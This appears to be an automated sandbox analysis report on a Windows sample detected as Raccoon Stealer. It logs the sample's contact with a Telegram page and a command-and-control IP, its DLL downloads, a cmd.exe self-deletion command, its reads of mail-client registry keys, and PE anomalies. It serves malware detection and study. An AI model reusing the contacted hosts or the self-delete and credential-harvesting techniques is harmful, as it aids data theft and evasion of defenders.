Source: nssckbi.dll.0.dr String found in binary or memory: https://www.catcert.net/verarrel05
Source: ldap60.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 91.219.236.69
Source: unknown DNS traffic detected: queries for: t.me
Source: global traffic HTTP traffic detected: GET /masterdanteloma HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic HTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/762b827e1bbc7bd715bf97e0fb01fbddd5bf5ab2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.69
Source: global traffic HTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.69
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49766 version: TLS 1.2

E-Banking Fraud:

Yara detected Raccoon Stealer
Source: Yara match File source: 0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Tk6dsSEyOC.exe.2340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR

System Summary:

Uses 32bit PE files
Source: Tk6dsSEyOC.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0041C217 0_2_0041C217
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004362A1 0_2_004362A1
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0041E6DA 0_2_0041E6DA
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0040E727 0_2_0040E727
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00410AD2 0_2_00410AD2
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00434CB5 0_2_00434CB5
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0041AD32 0_2_0041AD32
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0043CD97 0_2_0043CD97
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0041D364 0_2_0041D364
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0040D560 0_2_0040D560
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0040F78B 0_2_0040F78B
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00415816 0_2_00415816
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00427AAA 0_2_00427AAA
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00429B40 0_2_00429B40
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0040DC7B 0_2_0040DC7B
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0041DD0B 0_2_0041DD0B
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00435E43 0_2_00435E43
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0044C1E6 0_2_0044C1E6
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0043C20A 0_2_0043C20A
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0042035B 0_2_0042035B
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004103F7 0_2_004103F7
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0044C443 0_2_0044C443
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004185E7 0_2_004185E7
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0042862C 0_2_0042862C
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: String function: 00466770 appears 89 times
PE file does not import any functions
Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: Tk6dsSEyOC.exe, 00000000.00000003.427951428.000000004BC7E000.00000004.00000010.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.373328236.0000000002EE2000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000002.483474987.000000006FD92000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.373618716.000000004BC7F000.00000004.00000010.sdmp Binary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.376545109.0000000002EDD000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameIA2Marshal.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.427974547.0000000002EE6000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000002.481321705.000000004BC7E000.00000004.00000010.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.372509130.0000000002EE1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAccessibleMarshal.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.372483857.000000004BC51000.00000004.00000010.sdmp Binary or memory string: OriginalFilenameAccessibleMarshal.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.373284353.000000004BC7E000.00000004.00000010.sdmp Binary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.427918812.0000000002EDD000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.373416548.000000004BC7E000.00000004.00000010.sdmp Binary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000002.483336296.000000006EEEB000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.376567749.000000004BC7F000.00000004.00000010.sdmp Binary or memory string: OriginalFilenameIA2Marshal.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.378183747.0000000002EDD000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameldap60.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp Binary or memory string: OriginalFilenameldap60.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.373424728.0000000002EE2000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.373403037.000000004BC7E000.00000004.00000010.sdmp Binary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.373313194.000000004BC7E000.00000004.00000010.sdmp Binary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
PE file contains strange resources
Source: Tk6dsSEyOC.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Tk6dsSEyOC.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
PE file contains more sections than normal
Source: sqlite3.dll.0.dr Static PE information: Number of sections : 18 > 10
Source: Tk6dsSEyOC.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Tk6dsSEyOC.exe Virustotal: Detection: 49%
Source: Tk6dsSEyOC.exe ReversingLabs: Detection: 54%
Source: Tk6dsSEyOC.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Tk6dsSEyOC.exe "C:\Users\user\Desktop\Tk6dsSEyOC.exe"
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\Local\Temp\KVOjaLhCnJ.exe
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/68@1/8
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004279D5 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree, 0_2_004279D5
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File read: C:\Program Files (x86)\desktop.ini
Source: softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.0.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.0.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4560:120:WilError_01
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Mutant created: \Sessions\1\BaseNamedObjects\useriZ5i-O1fR-8gT0
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Command line argument: NaF 0_2_004660A0
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Tk6dsSEyOC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb source: Tk6dsSEyOC.exe
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.427951428.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000002.481321705.000000004BC7E000.00000004.00000010.sdmp, api-ms-win-core-memory-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb0= source: Tk6dsSEyOC.exe
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr, MapiProxy_InUse.dll.0.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
